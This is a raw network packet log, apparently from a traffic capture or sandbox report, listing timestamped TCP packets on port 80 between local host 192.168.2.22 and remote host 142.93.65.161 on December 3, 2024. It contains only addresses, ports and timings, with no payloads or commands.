                                                                                                                                                                                  Dec 3, 2024 14:01:02.017297983 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.017416000 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.017457962 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.022152901 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.022250891 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.022300959 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.026819944 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.026976109 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.027030945 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.031624079 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.031713009 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.031766891 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.036833048 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.037055016 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.037120104 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.041261911 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.041311979 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.041328907 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.041601896 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.044420004 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.142002106 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.142098904 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.142174959 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.144207954 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.144298077 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.144306898 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.147742033 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.147821903 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.147865057 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.147875071 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.147897005 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.152179956 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.152355909 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.152379990 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.152412891 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.156748056 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.156817913 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.156872034 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.161014080 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.161303043 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.161362886 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.164931059 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.165079117 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.165137053 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.169261932 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.169394970 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.169456005 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.172827005 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.172997952 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.173068047 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.176609039 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.176744938 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.176805973 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.180476904 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.180623055 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.180691957 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.184129953 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.184207916 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.184305906 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.187875986 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.187936068 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.188069105 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.188112020 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.191795111 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.192008018 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.192049980 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.195837021 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.195885897 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.195967913 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.196005106 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.199233055 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.199280977 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.199354887 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.199394941 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.203320980 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.203370094 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.203424931 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.203471899 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.206718922 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.206867933 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.206917048 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.210426092 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.210550070 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.210603952 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.214175940 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.214306116 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.214359999 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.217973948 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.218101978 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.218151093 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.221715927 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.221771955 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.221839905 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.221885920 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.225619078 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.225667953 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.225707054 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.225754976 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.229366064 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.229434013 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.229654074 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.229700089 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.233028889 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.233078003 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.233129025 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.233180046 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.236742020 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.236808062 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.236851931 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.236893892 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:05.758749008 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:10.276767015 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:10.399399042 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:10.399512053 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:10.399780035 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:10.519809961 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531014919 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531099081 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531101942 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531115055 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531145096 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531157017 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531495094 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531506062 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531517029 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531541109 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531562090 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532193899 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532206059 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532217026 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532228947 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532242060 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532259941 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532284021 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.533309937 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.757045031 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.757062912 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.757128954 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.758302927 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.760385036 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.799298048 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.799321890 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.799391985 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.878345013 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.878365040 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.878412008 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.883270025 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.883328915 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.919727087 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.919745922 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.919842958 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.920116901 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.920129061 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.920161009 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.920644999 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.920663118 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.920711040 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.921153069 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.921164989 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.921212912 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.921700001 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.921713114 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.921751976 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.922430038 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.922442913 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.922487974 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.923053026 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.923080921 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.923131943 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.923702955 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.923722982 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.923749924 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.923768997 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.924397945 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.924408913 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.924453020 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.933294058 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.933408022 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.933464050 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.937606096 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.937714100 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.937756062 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.998579979 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.998632908 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.998657942 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.998697042 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.002844095 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.002890110 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.002970934 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.003113031 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.011471987 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.011518002 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.011634111 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.011676073 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.039911985 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.040034056 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.040139914 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.044219971 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.044272900 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.044343948 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.044378042 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.052848101 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.052897930 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.053020000 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.053061962 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.061433077 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.061485052 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.061569929 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.061603069 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.069209099 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.069257021 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.069406986 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.069453955 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.076780081 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.076833010 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.076934099 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.077003002 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.081624031 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.081671953 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.081713915 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.081744909 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.087344885 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.087400913 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.087553978 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.087604046 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.093071938 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.093118906 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.093188047 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.093226910 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.099773884 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.099831104 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.099833012 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.099870920 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.105262041 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.105315924 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.105401993 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.105449915 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.110618114 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.110691071 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.110766888 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.110805988 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.116117954 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.116194963 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.116226912 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.116365910 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.121911049 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.121980906 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.121994019 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.122033119 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.127650023 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.127705097 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.127738953 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.127784967 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.133491993 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.133543968 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.133594036 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.133639097 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.139142990 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.139192104 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.139264107 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.139300108 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.144925117 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.144988060 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.144996881 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.145030975 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.150755882 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.150810957 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.150914907 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.150962114 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.156456947 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.156517029 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.156559944 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.156593084 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.162116051 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.162185907 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.162189960 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.162225008 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.167942047 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.167960882 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.167990923 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.168016911 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.173597097 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.173644066 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.173705101 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.174014091 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.179394007 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.179447889 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.179465055 CET8049169142.93.65.161192.168.2.22
